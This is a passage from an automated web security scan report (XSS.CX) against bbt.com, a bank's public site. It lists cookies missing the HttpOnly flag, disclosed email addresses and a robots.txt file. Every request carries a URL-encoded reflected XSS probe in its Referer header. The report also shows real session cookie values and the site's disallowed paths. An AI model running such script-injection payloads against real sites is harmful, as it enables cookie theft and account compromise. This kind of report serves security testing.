last-modified: Thu, 13 May 2010 18:42:47 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; Path=/

GIF89a..(.................................................fff..............................................................................ggg..........................................................
...[SNIP]...

4.8. http://bbt.com/bbt/images/topnav/bbt_learnplan.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/topnav/bbt_learnplan.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/topnav/bbt_learnplan.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fbbaeebafb; path=/
accept-ranges: bytes
content-length: 1537
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:34 GMT
etag: "05a5e67cbf2ca1:1db1"
last-modified: Thu, 13 May 2010 18:37:56 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/

GIF89a..(........................................fff...................................................................................................egf..............................................
...[SNIP]...

4.9. http://bbt.com/bbt/images/topnav/bbt_personal.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/topnav/bbt_personal.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/topnav/bbt_personal.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fabaeebafa; path=/
accept-ranges: bytes
content-length: 1473
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:34 GMT
etag: "80e4f9dcaf2ca1:1db1"
last-modified: Thu, 13 May 2010 18:32:17 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/

GIF89av.(.................................................fff...ggg...........................egf.......................................................................................................
...[SNIP]...

4.10. http://bbt.com/bbt/images/topnav/online_banking_login_top.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/topnav/online_banking_login_top.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/topnav/online_banking_login_top.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fdbaeebafd; path=/
accept-ranges: bytes
content-length: 3657
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "8090e0c3493ecb1:17ab"
last-modified: Tue, 17 Aug 2010 20:21:25 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/

GIF89a..(.......YYYKKK............|||.........^^^.....>..b.....n.........lll.....Y..............N.................R.....;...VUU...........B.........ppp.....*...........A...jjjnnnbbbvvv.....[~~~..ezzz.
...[SNIP]...

4.11. http://bbt.com/bbt/includes/javascript/AC_RunActiveContent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/includes/javascript/AC_RunActiveContent.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/includes/javascript/AC_RunActiveContent.js HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fabaeebafa; path=/
accept-ranges: bytes
content-type: application/x-javascript
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "0da84c47ca4c81:17ab"
last-modified: Tue, 22 Apr 2008 13:28:36 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/
Content-Length: 8321

//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved.
var isIE = (navigator.appVersion.indexOf("MSIE") !=
...[SNIP]...

4.12. http://bbt.com/bbt/includes/javascript/SpryEffects.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/includes/javascript/SpryEffects.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/includes/javascript/SpryEffects.js HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fdbaeebafd; path=/
accept-ranges: bytes
content-type: application/x-javascript
date: Mon, 20 Jun 2011 19:38:34 GMT
etag: "0791949766fc91:1db1"
last-modified: Mon, 05 Jan 2009 20:43:38 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/
Content-Length: 78295

// Spry.Effect.js - version 0.38 - Spry Pre-Release 1.6.1
//
// Copyright (c) 2006. Adobe Systems Incorporated.
// All rights reserved.
//
// Redistribution and use in source and binary forms, wi
...[SNIP]...

4.13. http://bbt.com/bbt/includes/javascript/browserDetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/includes/javascript/browserDetect.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/includes/javascript/browserDetect.js HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fabaeebafa; path=/
accept-ranges: bytes
content-type: application/x-javascript
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "805862ad718c91:17ab"
last-modified: Wed, 27 Aug 2008 18:21:09 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/
Content-Length: 7269

// ~*~ Start:javascript:browserDetect ~*~

// Browser Detect v2.1.6
// documentation: http://www.dithered.com/javascript/browser_detect/index.html
// license: http://creativecommons.org/licenses
...[SNIP]...

4.14. http://bbt.com/bbt/includes/javascript/new_window.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/includes/javascript/new_window.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/includes/javascript/new_window.js HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fbbaeebafb; path=/
accept-ranges: bytes
content-length: 1014
content-type: application/x-javascript
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "80a4b5b0e093c71:17bf"
last-modified: Fri, 11 May 2007 15:26:05 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; Path=/

// ~*~ Start:javascript:new_window ~*~

// POP UP WINDOW, centered on the screen
function NewWindow(mypage, myname, w, h, scroll) {
var winl = (screen.width - w) / 2;
var wint = (screen.he
...[SNIP]...

4.15. http://bbt.com/bbt/includes/javascript/swapimage.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/includes/javascript/swapimage.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/includes/javascript/swapimage.js HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fcbaeebafc; path=/
accept-ranges: bytes
content-length: 1371
content-type: application/x-javascript
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "04e397a9dec91:17ab"
last-modified: Thu, 04 Sep 2008 14:49:48 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/

// ~*~ Start:javascript:swapimage ~*~

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages(
...[SNIP]...

4.16. http://bbt.com/bbt/touchclarity/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/touchclarity/s_code.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/touchclarity/s_code.js HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fbbaeebafb; path=/
accept-ranges: bytes
content-type: application/x-javascript
date: Mon, 20 Jun 2011 19:38:34 GMT
etag: "04246a314b7ca1:1db1"
last-modified: Fri, 26 Feb 2010 18:51:00 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/
Content-Length: 37219

/* SiteCatalyst code version: H.21
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

5. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://bbt.com/bbt/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/careers/

Issue detail

The following email address was disclosed in the response:

Request

GET /bbt/careers/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 33890
cache-control: private
x-powered-by: ASP.NET
Content-Length: 34062


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

       
   <title>Car
...[SNIP]...
<a href="mailto:accessibility@bbandt.com">accessibility@bbandt.com </a>
...[SNIP]...

5.2. http://bbt.com/bbt/contactus/personal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/contactus/personal.html

Issue detail

The following email address was disclosed in the response:

Request

GET /bbt/contactus/personal.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:31 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 46022
cache-control: private
x-powered-by: ASP.NET
Content-Length: 46298


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
                   
...[SNIP]...
<a href="mailto:customercarebbt@sharebuilder.com">
...[SNIP]...

5.3. http://bbt.com/bbt/includes/javascript/xpath.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/includes/javascript/xpath.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /bbt/includes/javascript/xpath.js HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
accept-ranges: bytes
content-type: application/x-javascript
date: Mon, 20 Jun 2011 19:35:34 GMT
etag: "80fb249766fc91:17bf"
last-modified: Mon, 05 Jan 2009 20:43:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Content-Length: 72900

// xpath.js - version 0.7 - Spry Pre-Release 1.6.1
//
// Code from xmltoken.js.
//
// Copyright 2006 Google Inc.
// All Rights Reserved
//
// Defines regular expression patterns to extract XML
...[SNIP]...
<jtakagi@google.com>
...[SNIP]...
<mesch@google.com>
...[SNIP]...
<mesch@google.com>
...[SNIP]...

6. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: bbt.com

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-length: 803
content-type: text/plain
date: Mon, 20 Jun 2011 19:34:56 GMT
etag: "80b65714957eca1:17bf"
last-modified: Wed, 16 Dec 2009 21:16:49 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET

# The following files were requested to be excluded from search engines including our internal engine
# BB&T Site Server

User-agent: *
Disallow: /adminasp/
Disallow: /about/cra/goodcompanynewsle
...[SNIP]...

Report generated by XSS.CX at Mon Jun 20 14:41:34 CDT 2011.